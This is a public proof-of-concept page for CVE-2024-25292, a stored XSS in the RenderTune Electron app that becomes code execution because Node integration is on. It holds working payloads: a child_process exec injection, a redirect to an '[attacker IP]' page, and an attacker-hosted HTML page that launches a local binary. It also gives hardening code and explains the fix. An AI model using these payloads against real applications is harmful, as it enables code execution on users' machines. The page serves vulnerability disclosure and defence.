
CVE-2024-25292 PoC — RenderTune 安全漏洞

Source
Associated Vulnerability
Title: RenderTune security vulnerability (CVE-2024-25292)
Description: RenderTune is a free Electron application for Mac/Windows/Linux that uses ffmpeg to combine audio and image files into a video file. RenderTune v1.1.4 contains a cross-site scripting (XSS) vulnerability. An attacker can exploit it to execute arbitrary web script or HTML by injecting a crafted payload into the Upload Title parameter.
Description
PoC for CVE-2024-25292
Readme
# RenderTune RCE

A proof of concept for the CVE-2024-25292 vulnerability.

A cross-site scripting (XSS) vulnerability in RenderTune v1.1.4 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Upload Title parameter.
This repository contains an example of the vulnerable application and a proof-of-concept (PoC) exploit for it.

As a PoC there is a Python file that automates the process.
---------------------------------------

#### 1. Vulnerability Overview:
The Upload Title field is rendered as HTML, so script injected there runs in the application's renderer. Because that renderer has Node integration enabled, the injected script can call NodeJS APIs, which turns the XSS into remote code execution (RCE).

---------------------------------------

#### 2. Vulnerability Cause:
* Same root cause as the nteract 0.28.0 issue, which allowed an Electron webview via a Markdown link with resultant remote code execution because nodeIntegration in webPreferences was true.
* Exploit explanation
  * When the application renders a link from Markdown it creates a WebView through Electron, so the link can reach an external address. An attacker can therefore achieve Remote Code Execution (RCE) by making the application load a page on the attacker's server, where the page's script still has access to Node.

Proof-of-concept (POC)
----------------------
### Case 1) XSS to RCE.
Step 1) Confirm that XSS occurs in the title field
※ The Upload item is only registered when an image is attached, so attach one before submitting the payload.
```html
<script>alert('JRURU')</script>
```
![renderTune1](https://github.com/QnA4u/CVE/assets/131337101/4f8e44e1-a80d-4d86-bea3-2e908dc2e35b)


Step 2) Because the renderer has Node integration, the same injection point can be used to execute NodeJS system commands:
```html
<script>require('child_process').exec('C:/Windows/System32/calc.exe')</script>
```
![renderTune2](https://github.com/QnA4u/CVE/assets/131337101/78fbccf5-3deb-4dd4-abfe-88ce0b30e448)

### Case 2) Attacks through an attacker server
※ The title is stored, so a window.location payload redirects the app to the attacker's page automatically every time the app is launched.
```html
<script>window.location='http://[attacker IP]/[PoC.html]'</script>
```
**Note:** ※ To test quickly, start a web server on the attacker's PC with:
```bash
$ python -m http.server 80
```

* PoC Code
```html
<html>
<head>
  <title>jruru Link</title>
</head>
<body>

  <!-- Trigger the function from the tag's own onclick handler -->
  <a id="jruruLink" href="#" onclick="openExternal()">jruru Link</a>

  <script>
    // Use Electron's shell module (reachable because Node integration is on) to launch a local binary
    function openExternal() {
      try {
        const { shell } = require('electron');
        shell.openExternal('file:C:/Windows/System32/calc.exe');
      } catch(e) {
        alert('JRURU');
        alert(e);
      }
    }

    // Also run the function automatically when the page loads, so no click is needed
    document.addEventListener('DOMContentLoaded', function() {
      openExternal();
    });
  </script>
</body>
</html>
```
![renderTune3](https://github.com/QnA4u/CVE/assets/131337101/a2d26c2e-4004-45d2-8b63-36702087f597)
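The root cause described in section 2 (an untrusted title rendered as HTML in a renderer that has Node integration) and the `window.location` redirect used in Case 2 are easier to see next to their fixes. The following is an added example written for this page, not RenderTune's own code: the names `renderTitleUnsafe`, `renderTitleSafe`, `escapeHtml`, `hardenedWebPreferences` and `lockNavigation`, and the sample title, are assumptions for illustration. It is plain Node.js so it runs without Electron; the `webPreferences` object is what one would pass to `new BrowserWindow({ webPreferences })`, and the `will-navigate` handler is the one Electron exposes on `win.webContents`.

```javascript
// Added example (not RenderTune's code): the renderer-side pattern that turns a
// stored XSS in a title field into Node-level RCE when the BrowserWindow is
// created with nodeIntegration: true, shown beside the hardened equivalent.
// All identifiers here are assumptions for illustration.

// Constructed sample input: a title of the kind the PoC injects.
const MALICIOUS_TITLE = "<script>require('child_process').exec('calc.exe')</script>";

// Weak main-process configuration: renderer script can call require().
const weakWebPreferences = {
  nodeIntegration: true,
  contextIsolation: false,
};

// Hardened configuration: no Node in the renderer, isolated preload context,
// sandboxed renderer, and no <webview> tag that could load remote content.
function hardenedWebPreferences() {
  return {
    nodeIntegration: false,
    contextIsolation: true,
    sandbox: true,
    webviewTag: false,
  };
}

// Vulnerable rendering: the untrusted title is interpolated as raw HTML.
function renderTitleUnsafe(title) {
  return `<h2 class="upload-title">${title}</h2>`;
}

// Safe rendering: escape the HTML-significant characters so the title is shown
// as text. (In a real renderer, element.textContent = title does the same.)
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}
function renderTitleSafe(title) {
  return `<h2 class="upload-title">${escapeHtml(title)}</h2>`;
}

// Quick check: does the rendered markup still contain a <script> element?
function containsScript(html) {
  return /<script\b/i.test(html);
}

// Main-process guard against the Case 2 redirect: cancel any navigation whose
// target is not under the app's own origin (e.g. its file:// bundle). `win` is
// any object with webContents.on; in practice an Electron BrowserWindow.
function lockNavigation(win, allowedPrefix) {
  win.webContents.on('will-navigate', (event, url) => {
    if (!url.startsWith(allowedPrefix)) {
      event.preventDefault();
    }
  });
}

// Stand-alone demonstration.
if (typeof require !== 'undefined' && require.main === module) {
  console.log('unsafe  :', renderTitleUnsafe(MALICIOUS_TITLE));
  console.log('safe    :', renderTitleSafe(MALICIOUS_TITLE));
  console.log('weak    :', weakWebPreferences);
  console.log('hardened:', hardenedWebPreferences());
}
```

Escaping only neutralizes the title; the real fix is the `webPreferences` change, because with Node integration off even a successful HTML injection cannot reach `require`. The navigation lock closes the separate path in Case 2, where the payload does not need to run Node itself but only has to send the window to a page that does.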

---------------------------------------

File Snapshot

```
/data/pocs/d0de67b5eeaeeb7d33b340869c06fdf3b8e04618
├── [ 643] jruru.html
└── [3.0K] README.md

0 directories, 2 files
```